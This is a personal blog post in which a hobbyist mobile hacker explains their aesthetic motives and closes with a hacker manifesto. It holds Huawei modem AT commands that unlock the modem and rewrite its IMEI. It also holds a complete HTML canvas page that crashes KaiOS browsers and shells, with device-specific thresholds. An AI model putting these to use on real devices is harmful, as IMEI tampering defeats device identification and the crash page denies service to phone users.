On attitude, part 2

Before I continue with anything in this blog, let me make something perfectly clear…

Whatever I do with mobile technologies, I don’t do it for a living. I earn my money in a completely different area that has absolutely nothing to do with mobiles. And I absolutely don’t promote any mobile brand (be it hardware or software). In fact, they are all equally bad to me, but some of them are at least tolerable. So, what do I earn here, besides some (a bit debatable) respect from the community?

First, experience. A lot of. Even after my recent post, I was able to do a lot of new things. I managed to create fake voicemail notification message with their count (more on that in some of the next posts). I managed to relock an “unlockable” Huawei E173z-1 HSPA modem from one carrier to mine. I managed to find a readable Huawei Datalock V2 algorithm implementation (planning to refactor it from Python 2 to Kotlin) and to change modem’s IMEI with it:

1
2
3
AT^DATALOCK="this_v2_code"
AT^CIMEI="new_15_digit_imei"
AT^INFORBU

I managed to find out that recently received CAT B35 also has a firmware signed with 6.0.1 test-keys (just like Nokia 8110 4G firmware before v13), even with the recent update, and their “security” relies on the mere fact that no one had been able to manually enter the recovery menu yet.

I also learned about a Canvas vulnerability that each and every KaiOS device is exposed to:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<!DOCTYPE html>
<html>
<head>
<meta charset=utf-8>
<title>Malevich attack</title>
</head>
<body>
<canvas id="canvas" width="500" height="500"> </canvas>
<script>
var canvas = document.getElementById("canvas");
var width = canvas.width;
var height = canvas.height;
var ctx = canvas.getContext("2d");
var N = 1495;
for(var i = 0; i < N; i++) {
ctx.moveTo(i%width, 0);
ctx.lineTo(i, height);
ctx.stroke();
}
</script>
</body>
</html>

This code is a simpler version, already modified by me, that draws a black square instead of stripes like in the original CVE report. That’s why I call it “Malevich attack”.
You can manipulate N and observe the behavior for different devices: either full Gecko crash or a background shell crash that occurs when you exit the browser. The N values to start triggering background/foreground crash are around 1181/1495 for B35 and 1121/1435 for 8110 4G (v13/GerdaOS) respectively. This has yet to be exploited but the power of this attack has been clearly noticed.

Not to mention I created an alternative keyboard implementation for Xiaomi Qin 1s. So yes, experience is definitely my first gain from this. But it’s not the only one, and not even the main one. What’s the second one?

Well, the second one is not so easy to explain. You see, all of this is a sort of art. Like that Black Square painting by Malevich. A simple, blunt and radical form of art that carries a message. This is why very few people understood Malevich back then, and very few people can understand my real motives right now. They are almost entirely non-political, they are almost entirely aesthetical. I value freedom, especially freedom of communication, but I value aesthetics even more. Freedom of communication is just some means for the people of the world to do… To do what?

If you try rationalizing this whole thing of my obsession with infosec (and mobile security in particular), you’ll end up in a dead end. Because there’s one more obsession beyond this which can’t be explained, rationalized or calculated. I don’t do this because I find it useful, I do this because I find it beautiful. It’s all about aesthetics - the almighty religion that penetrates the minds of even the most hardcore atheists (like me). Heck, even the Third Reich had one, and was particularly obsessed with it. Yes, aesthetics is such a powerful thing that even the most horrible worldwide crimes can be committed in its name. Committed, pushed and merged.

And of course, just like suprematism (not to be confused with supremacism) led by Malevich himself, it’s also about sending a message. What message? To whom? Well, it’s a message to all who try making money out of the beauty that should be accessible to everyone for free. To all the scum that tries to sell you mere digits for you to be able to unlock your phone or modem which you already bought for your own money. To all the lowlifes who try to make your privacy vulnerable by locking you down to Faildows, the worst platform in existence, to be able to accomplish certain tasks. To all the noobs who can’t think outside what the same morons and pseudo-elitist script kiddies they consider “gurus” told them, and to those self-proclaimed “gurus” as well.

And my message to all those parasites is simple: there is a world without you. My ultimate goal is to just show everyone else that it is possible to create such a world. In the name of freedom, in the name of beauty and for the sake of opening up much more technological wonders, which you are trying to monopolize and monetize, to the entire planet.
And, just so you know, I’m not alone in this effort.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can’t stop us all… after all, we’re all alike.
© The Mentor, 1986

_